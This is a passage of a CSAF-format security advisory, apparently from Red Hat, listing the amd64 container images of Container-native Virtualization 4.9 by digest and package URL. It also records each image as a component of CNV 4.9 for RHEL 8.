"pkg:oci/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubernetes-nmstate-handler-rhel8\u0026tag=v4.9.6-5" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", "product": { "name": "container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", "product_id": "container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-ssp-operator\u0026tag=v4.9.6-5" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", "product": { "name": "container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", "product_id": "container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-template-validator\u0026tag=v4.9.6-6" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", "product": { "name": "container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", "product_id": "container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-v2v-conversion\u0026tag=v4.9.6-3" } } }, { "category": "product_version", "name": "container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", "product": { "name": "container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", "product_id": "container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", "product_identification_helper": { "purl": "pkg:oci/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-vmware\u0026tag=v4.9.6-3" } } }, { "category": "product_version", "name": "container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", "product": { "name": "container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", "product_id": "container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", "product_identification_helper": { "purl": "pkg:oci/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/libguestfs-tools\u0026tag=v4.9.6-9" } } }, { "category": "product_version", "name": "container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", "product": { "name": "container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", "product_id": "container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", "product_identification_helper": { "purl": "pkg:oci/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/node-maintenance-operator\u0026tag=v4.9.6-4" } } }, { "category": "product_version", "name": "container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", "product": { "name": "container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", "product_id": "container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", "product_identification_helper": { "purl": "pkg:oci/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-marker\u0026tag=v4.9.6-3" } } }, { "category": "product_version", "name": "container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", "product": { "name": "container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", "product_id": "container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", "product_identification_helper": { "purl": "pkg:oci/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-plugin\u0026tag=v4.9.6-3" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", "product": { "name": "container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", "product_id": "container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-api\u0026tag=v4.9.6-9" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", "product": { "name": "container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", "product_id": "container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-artifacts-server\u0026tag=v4.9.6-9" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", "product": { "name": "container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", "product_id": "container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-apiserver\u0026tag=v4.9.6-4" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", "product": { "name": "container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", "product_id": "container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-cloner\u0026tag=v4.9.6-4" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", "product": { "name": "container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", "product_id": "container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-controller\u0026tag=v4.9.6-4" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", "product": { "name": "container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", "product_id": "container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-importer\u0026tag=v4.9.6-4" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", "product": { "name": "container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", "product_id": "container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-operator\u0026tag=v4.9.6-4" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", "product": { "name": "container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", "product_id": "container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadproxy\u0026tag=v4.9.6-4" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", "product": { "name": "container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", "product_id": "container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadserver\u0026tag=v4.9.6-4" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", "product": { "name": "container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", "product_id": "container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-controller\u0026tag=v4.9.6-9" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", "product": { "name": "container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", "product_id": "container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-handler\u0026tag=v4.9.6-9" } } }, { "category": "product_version", "name": "container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", "product": { "name": "container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", "product_id": "container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", "product_identification_helper": { "purl": "pkg:oci/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virtio-win\u0026tag=v4.9.6-3" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", "product": { "name": "container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", "product_id": "container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-launcher\u0026tag=v4.9.6-9" } } }, { "category": "product_version", "name": "container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", "product": { "name": "container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", "product_id": "container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", "product_identification_helper": { "purl": "pkg:oci/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-operator\u0026tag=v4.9.6-9" } } }, { "category": "product_version", "name": "container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", "product": { "name": "container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", "product_id": "container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", "product_identification_helper": { "purl": "pkg:oci/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/vm-import-controller-rhel8\u0026tag=v4.9.6-3" } } }, { "category": "product_version", "name": "container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", "product": { "name": "container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", "product_id": "container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", "product_identification_helper": { "purl": "pkg:oci/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/vm-import-operator-rhel8\u0026tag=v4.9.6-3" } } }, { "category": "product_version", "name": "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", "product": { "name": "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", "product_id": "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", "product_identification_helper": { "purl": "pkg:oci/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/vm-import-virtv2v-rhel8\u0026tag=v4.9.6-3" } } } ], "category": "architecture", "name": "amd64" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64" }, "product_reference": "container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64" }, "product_reference": "container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64" }, "product_reference": "container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64" }, "product_reference": "container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64" }, "product_reference": "container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64" }, "product_reference": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64" }, "product_reference": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64" }, "product_reference": "container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64" }, "product_reference": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64" }, "product_reference": "container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64" }, "product_reference": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64" }, "product_reference": "container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64" }, "product_reference": "container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64" }, "product_reference": "container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64" }, "product_reference": "container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64" }, "product_reference": "container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", "relates_to_product_reference": "8Base-CNV-4.9" }, { "category": "default_component_of", "full_product_name": { "name": "container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64 as a component of CNV 4.9 for RHEL 8", "product_id": "8Base-CNV-4.9:container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64" }, "product_reference": "container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", "relates_to_product_reference": 